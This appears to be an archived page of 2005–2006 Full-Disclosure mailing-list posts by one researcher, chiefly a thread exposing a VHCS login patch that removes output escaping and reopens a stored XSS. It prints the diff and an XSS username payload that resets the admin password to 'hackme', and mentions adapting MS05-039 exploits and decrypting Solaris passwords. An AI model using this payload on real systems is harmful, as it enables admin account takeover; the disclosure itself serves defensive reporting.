Summary:Weak change password mechanism

  The script "admin/change_password.php" allows to change password without
asking for the old password. This "feature" was used at exploiting bug #1
(for fun and profit).

.: [ BUG #3 ]

Severity:   Critical
Affected:, (and lower)
Fixed:  Patch v.3
Summary:check_login() authentication bypass

  The script "gui/include/login.php" contains the following function (

function check_login () {
if (isset($_SESSION['user_logged'])) {
if (!check_user_login($_SESSION['user_logged'], $_

[Full-disclosure] Re: VHCS Security Patch - 2006-02-05 --> Fake!

2006-02-07 Thread Roman Medina-Heigl Hernandez

Let's summary:
1.- You (as VHCS "vendor") publish a patch that when installed opens a
big security hole (as demonstrated in my former analysis).
2.- You didn't notify security mailing-lists (as a responsible vendor
would do if a new security bug has been identified and fixed, which is
what you are claiming).
3.- Someone (me), publicly reports it (with cc to you) (I already argued
why I decided to go public; read my former mail).
4.- You answer saying it has now been fixed but you didn't publish any
reference or info in the VHCS page.
5.- So a VHCS customer who downloaded the wrong patch (and does not
consult security mls/sites) won't notice any change in your original
announce and will be vulnerable indeed. You are not correctly informing
your users.
6.- I publicly ask you for a clarification about the real bug which was
supposed to have been fixed and you didn't answer. Anything to hide?
7.- I didn't get any response but an offending mail accusing me of
elevating alarm level at securitywizardry... Pathetic.

Sorry, but I don't believe in security through obscurity. Insulting
people reporting problems is not the solution. Acknowledging your own
errors and clarifying the situation is. VHCS users deserve an official
explanation. Is / isn't really vulnerable to a new bug?

PS: I'm posting this to full-disclosure, as an example of how a vendor
response to a security issue should never be.

-Román (aka the "stupid asshole" :-))

Alexander Kotov [moleSoftware] wrote:
> If you want to go public in the furute fiest conatact someone of the dev
> team
> Wait at least 1 day and then go public ...  stupid asshole
> here the results of your activiy
> Fuck you
> Alex
> Roman Medina-Heigl Hernandez wrote:
>> Hi Alex,
>> My apologies if I've been a bit rough, but public security mailing-lists
>> are intended to deal with (un)security issues. I don't understand why
>> you didn't announce in mls the issue if a new vuln was being fixed. It
>> seemed some kind of joke or hack, since I missed the "die()" function
>> and I only saw security fixes being removed, so it was suspicious. I
>> decided to go public because people could be downloading wrong patch.
>> I didn't have time to analyze the effects of die() line there. I suppose
>> that's the real fix, isn't it? Could you elaborate on that? What's the
>> real vuln being fixed?
>> Sorry for the inconvenience. No offense was intended.
>> Cheers,
>> -Roman
>> Alexander Kotov [moleSoftware] wrote:
>>> Hi Roman,
>>> u ... I'm human being and make mistakes. I just got older version of
>>> the file.
>>> Now I rebuilded the tarball and the problem is fixed.
>>> I think it is not necessary to post such kind of messages in public
>>> mailinglists
>>> before you contact someone of the development team and wait at least
>>> some hours.
>>> cheers
>>> Alex
>>> Roman Medina-Heigl Hernandez wrote:
>>>> Hi,
>>>> I've just visited VHCS main page and noticed the following "security
>>>> patch":
>>>> It reads:
>>>> "This patch is for all VHCS versions.
>>>> You have to update only one GUI file - /vhcs2/gui/include/login.php
>>>> Just replace the file
>>>> "
>>>> Well, just do NOT apply it It's a fake! Indeed it will leave your
>>>> VHCS installation vulnerable to a high severity cross-site-scripting
>>>> issue!
>>>> See it:
>>>> login_orig_unix.php --> original login.php (converted to Unix)
>>>> login_new_unix.php  --> login.php from "security patch"
>>>> [EMAIL PROTECTED]:~$ diff login_orig_unix.php login_new_unix.php
>>>> 38c38
>>>> <   write_log("Login error,
>>>> ".htmlspecialchars($uname,
>>>> ENT_QUOTES, "UTF-8")." unknown username");
>>>> ---
>>>>> write_log("Login error, ".$uname." unknown

[Full-disclosure] Re: VHCS Security Patch - 2006-02-05 --> Fake!

2006-02-05 Thread Roman Medina-Heigl Hernandez
Hi Alex,

My apologies if I've been a bit rough, but public security mailing-lists
are intended to deal with (un)security issues. I don't understand why
you didn't announce in mls the issue if a new vuln was being fixed. It
seemed some kind of joke or hack, since I missed the "die()" function
and I only saw security fixes being removed, so it was suspicious. I
decided to go public because people could be downloading wrong patch.

I didn't have time to analyze the effects of die() line there. I suppose
that's the real fix, isn't it? Could you elaborate on that? What's the
real vuln being fixed?

Sorry for the inconvenience. No offense was intended.


Alexander Kotov [moleSoftware] wrote:
> Hi Roman,
> u ... I'm human being and make mistakes. I just got older version of
> the file.
> Now I rebuilded the tarball and the problem is fixed.
> I think it is not necessary to post such kind of messages in public
> mailinglists
> before you contact someone of the development team and wait at least
> some hours.
> cheers
> Alex
> Roman Medina-Heigl Hernandez wrote:
>> Hi,
>> I've just visited VHCS main page and noticed the following "security
>> patch":
>> It reads:
>> "This patch is for all VHCS versions.
>> You have to update only one GUI file - /vhcs2/gui/include/login.php
>> Just replace the file
>> "
>> Well, just do NOT apply it It's a fake! Indeed it will leave your
>> VHCS installation vulnerable to a high severity cross-site-scripting
>> issue!
>> See it:
>> login_orig_unix.php --> original login.php (converted to Unix)
>> login_new_unix.php  --> login.php from "security patch"
>> [EMAIL PROTECTED]:~$ diff login_orig_unix.php login_new_unix.php
>> 38c38
>> <   write_log("Login error, ".htmlspecialchars($uname,
>> ENT_QUOTES, "UTF-8")." unknown username");
>> ---
>>>  write_log("Login error, ".$uname." unknown
>> username");
>> 75c75
>> <
>> write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
>> is not OK - user can not login");
>> ---
>> write_log( $uname." Domain status is not OK - user can not login");
>> 104c104
>> <   write_log( htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." user logged in.");
>> ---
>>>  write_log( $uname." user logged in.");
>> 112c112
>> <   write_log( htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." bad password login data.");
>> ---
>>>  write_log( $uname." bad password login data.");
>> 190c190
>> <   write_log(htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." user session timed out");
>> ---
>>>  write_log($uname." user session timed out");
>> 199c199
>> <   write_log(htmlspecialchars($uname, ENT_QUOTES,
>> "UTF-8")." bad session data.");
>> ---
>>>  write_log($uname." bad session data.");
>> 258a259
>>>  die();
>> 261a263
>>> }
>> 437c439
>> < }
>> ---
>>> //}
>> As you can see, the "patch" removes htmlspecialchars() calls letting
>> login.php vulnerable . Nasty...
>> If you apply the "patch" (or have an old VHCS install, for instance
>> version <=, the XSS bug is active. Just for fun, you can
>> exploit it by entering the following as "username" (in the login entry
>> page):
>> > action="ch%61nge_password.php">> name="pass" value="hackme">> name="uaction"
>> value="updt_pass">document.dsr.submit()
>> When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
>> password will be set up to "hackme" :-) The %61 trick is necessary to
>> bypass some string substitution. This exploit combines the XSS bug with
>> what I see as a poor security design bug, which is letting change
>> password without supplying the old one (Alex, please, fix it in next
>> release!).
>> Summarizing, my recommendation: use VHCS, don't apply patch.



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] VHCS Security Patch - 2006-02-05 --> Fake!

2006-02-05 Thread Roman Medina-Heigl Hernandez


I've just visited VHCS main page and noticed the following "security patch":

It reads:

"This patch is for all VHCS versions.
You have to update only one GUI file - /vhcs2/gui/include/login.php

Just replace the file

Well, just do NOT apply it It's a fake! Indeed it will leave your
VHCS installation vulnerable to a high severity cross-site-scripting issue!

See it:
login_orig_unix.php --> original login.php (converted to Unix)
login_new_unix.php  --> login.php from "security patch"

[EMAIL PROTECTED]:~$ diff login_orig_unix.php login_new_unix.php
<   write_log("Login error, ".htmlspecialchars($uname,
ENT_QUOTES, "UTF-8")." unknown username");
>   write_log("Login error, ".$uname." unknown
write_log( htmlspecialchars($uname, ENT_QUOTES, "UTF-8")." Domain status
is not OK - user can not login");
write_log( $uname." Domain status is not OK - user can not login");
<   write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user logged in.");
>   write_log( $uname." user logged in.");
<   write_log( htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad password login data.");
>   write_log( $uname." bad password login data.");
<   write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." user session timed out");
>   write_log($uname." user session timed out");
<   write_log(htmlspecialchars($uname, ENT_QUOTES,
"UTF-8")." bad session data.");
>   write_log($uname." bad session data.");
>   die();
> }
< }
> //}

As you can see, the "patch" removes htmlspecialchars() calls letting
login.php vulnerable . Nasty...

If you apply the "patch" (or have an old VHCS install, for instance
version <=, the XSS bug is active. Just for fun, you can
exploit it by entering the following as "username" (in the login entry


When the VHCS admin enters the "Admin Log" page (in VHCS menu)... his
password will be set up to "hackme" :-) The %61 trick is necessary to
bypass some string substitution. This exploit combines the XSS bug with
what I see as a poor security design bug, which is letting change
password without supplying the old one (Alex, please, fix it in next

Summarizing, my recommendation: use VHCS, don't apply patch.



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Re: [Full-disclosure] Invi LogWripper

2006-01-30 Thread Roman Medina-Heigl Hernandez
devy wrote:
> It worked for me and it will work for you, if you're not a script-kiddie. 
> *

This sentence sounds familiar to me... :-) (tip: google for it)

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[Full-disclosure] Re: (offtopic) Lame postmaster at Radware?

2006-01-26 Thread Roman Medina-Heigl Hernandez
Sorry, I forgot the attachments (thanks Steve).



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
--- Begin Message ---
Action Taken:
An attempt to disinfect the attachment was unsuccessful,
so the attachment was quarantined from the message and replaced with
a text file informing the recipient of the action taken. The infected attachment
has been placed in the designated quarantine folder.
Please exercise extreme caution when handling the quarantined attachment


Roman Medina-Heigl Hernandez


TWiki exploit ( / CAN-2004-1037)

Attachment Details:-

Attachment Name:
Infected? Yes
Repaired? No
Virus Name: Perl/Exploit-TWiki

<>--- End Message ---
--- Begin Message ---
Action Taken:
An attempt to disinfect the attachment was unsuccessful,
so the attachment was quarantined from the message and replaced with
a text file informing the recipient of the action taken. The infected attachment
has been placed in the designated quarantine folder.
Please exercise extreme caution when handling the quarantined attachment


Roman Medina


RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability

Attachment Details:-

Attachment Name: RS-Labs-Advisory-2004-1.txt
File: RS-Labs-.txt
Infected? Yes
Repaired? No
Virus Name: JS/Exploit-CrossSite

<>--- End Message ---
--- Begin Message ---
Action Taken:
An attempt to disinfect the attachment was unsuccessful,
so the attachment was quarantined from the message and replaced with
a text file informing the recipient of the action taken. The infected attachment
has been placed in the designated quarantine folder.
Please exercise extreme caution when handling the quarantined attachment


Roman Medina


[Full-Disclosure] RS-2004-1: SquirrelMail "Content-Type" XSS vulnerability

Attachment Details:-

Attachment Name: RS-Labs-Advisory-2004-1.txt
File: RS-Labs-.txt
Infected? Yes
Repaired? No
Virus Name: JS/Exploit-CrossSite

<>--- End Message ---
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] (offtopic) Lame postmaster at Radware?

2006-01-26 Thread Roman Medina-Heigl Hernandez


Am I the only one receiving error messages like these since 1+ year ago?
Attempts to contact postmaster at Radware were useless. Perhaps some
more responsible ppl at Radware can help...

PS: My apologies to the list. I couldn't find another method for trying
to stop this.



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

Re: [Full-disclosure] NS1 decryption

2006-01-16 Thread Roman Medina-Heigl Hernandez
Bojan wrote:
> The libsldap library obviously can decrypt this, so it should be easy to
> write a tool which will do this (once you know how encryption/decryption
> works). But, from the text above, it's pretty clear that this is not a
> one way function.

Since NS1 mechanism is pretty old, I cannot believe it doesn't exist
such a tool or that the algorithm has not been published yet, but the
fact is than I couldn't find neither of them :-(



PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia -

[Full-disclosure] NS1 decryption

2006-01-16 Thread Roman Medina-Heigl Hernandez

I've been told that Solaris' NS_LDAP_BINDPASSWD could be decrypted. For

$ ldapclient -l

The pass is {NS1}3d1a48x. Is it really possible to decode it and
get the plaintext password? I couldn't find any useful info about
decoding NS1 passwords.

Any help?


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Re: [Full-disclosure] Exploit code repository

2005-12-20 Thread Roman Medina-Heigl Hernandez
Francisco Sáa Muñoz wrote:
> You can get the Securityfocus exploits collection in the latest versions
> from Whax distribution ;)

Whax is great. It also contains ExploitTree, if I remember correctly (or
it was Auditor? Or both? ...) Btw, does anybody know when Auditor+Whax
"merge" is going to be released?

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Re: [Full-disclosure] Exploit code repository

2005-12-20 Thread Roman Medina-Heigl Hernandez

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[Full-disclosure] Framework for the aid of exploiting SQL injection

2005-11-17 Thread Roman Medina-Heigl Hernandez

Is there any recommended tool which helps to get databases tables,
entries, structure, etc, given a particular SQL injection bug in one
application? I mean, it should *automatically* try different sentences
to figure out the names of the columns and in general, other useful info
from the database. Perhaps a PoC of some of NGSSoftware's papers or a
more elaborated tool... I'd like to hear from you what's the state of
the art in this very particular web-appsec field (so feel free to talk
about tools oriented to different database flavours, if you want: SQL
Server, Oracle, MySQL, Access, etc...).


PD: For God's sake, don't continue feeding non-sense threads like the
former Netdev's related flamewar. The best thing you can do is to ignore



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[Full-disclosure] Re: MS05_039 Exploitation (different languages)

2005-08-26 Thread Roman Medina-Heigl Hernandez
Hash: SHA1

Sanjay Rawat wrote:
> I too observed the same thing. i am running a windows 2K, SP4. i found
> that base address of UMPNPMGR.DLL is 0x767a. however, when i run the
> attack with this address, the target machine got rebooted (a crash).
> this may be, because umpnpmgr.dll is a part of "service.exe", therefore,
> on failure, it reboots. but with the unchanged base address, it worked
> perfectly. so now the same code can be used for DoS also!!!

You are simply crashing "services" proccess because EIP is not reaching
the right instructions (eg: pop;pop;ret) or (depending on process'
memory layout) it's referencing an invalid address. When Windows detects
the crash, it reboots (since it lacks an important system component).
This is a side effect. Anyway, if you have a shell, why do you want a
simple DoS? :)

In order to clarify:
- - my hacked hod's exploit changed "destination EIP" to match Spanish
systems. So it will NOT work on English systems (call it "DoS"; I prefer
to name it "didn't work" ;-)). And that's why appended "-spanish" to
- - for Metasploit module, I simply added a new "target", so it supports
both English (target 0) and Spanish (target 1). It can be directly
copied to "exploits" directory on Metasploit source-tree. That's the
reason I didn't change filename in this case (hdm: feel free to add it
to Metasploit).

Finally, the purpose of my post was not only to add a new target to an
exploit (ml would be fastly flooded with tons of similar mails, if every
people did it... so please, don't do it, I'm a bad example :-(), but to
bring attention over the base address issue and try to learn from you,
guys :). Indeed, I still have some questions:
- - which is the connection between different languages' Windows, if there
is any? (for instance, [EMAIL PROTECTED] suggested that "french offets are
like the deutsch") (btw, I didn't change the offset but the base
address, which is a different thing)
- - any more or less accurate list of connections/links in Windows across
different languages? Or perhaps it's something fairly random?

PS: You could write directly to me and I'll summarize responses
(different base addresses for the exploit are welcome; I don't think
it's appropiate to flood the mailing-list with this...).

- --

- -Roman

PGP Fingerprint:
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[Full-disclosure] MS05_039 Exploitation (different languages)

2005-08-25 Thread Roman Medina-Heigl Hernandez
Hash: SHA1


I tested existing exploits for PnP bug on my W2k SP4 machine (Spanish)
and they didn't work ("services" process is crashing but I got no
shell). So I did a quick review with Olly and I realized that
umpnpmgr.dll is being loaded at a different base address. In Spanish
systems this base address is 0x7677 but current exploits are
assumming (I guess) 0x767a. Then I did a quick hack to HOD's exploit
and it worked perfectly. I also modified Metasploit's module and
included a target for Spanish systems. I've attached resulting exploits
(they are trivial, though).

Is it usual that Windows DLLs have different base address across same
Windows/SP versions (but different languages)?

- --

- -Roman

PGP Fingerprint:
09BB EFCD 21ED 4E79 25FB  29E1 E47F 8A7D EAD5 6742
[Key ID: 0xEAD56742. Available at KeyServ]
Version: GnuPG v1.4.0 (MingW32)


Description: GNU Unix tar archive
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Re: [Full-disclosure] Fernando Gont remote command execution and big mouth vulnerability

2005-08-04 Thread Roman Medina-Heigl Hernandez

Fernando Gont wrote:
> At 09:04 a.m. 03/08/2005, Joxean Koret wrote:

Well, not precisely an example of politeness but it seems true... Have a
look to the signature:
"Gont's web site
Contact Fernando Gont at [EMAIL PROTECTED]"

> FYI, my website is .
> My site does not contan scripts, and is hosted on an OpenBSD server.

Umm, let's see this:

And that:

Mysteriously your site was silenty updated hours ago and dig tool removed...

PS: Only my thoughts, no offense meant.

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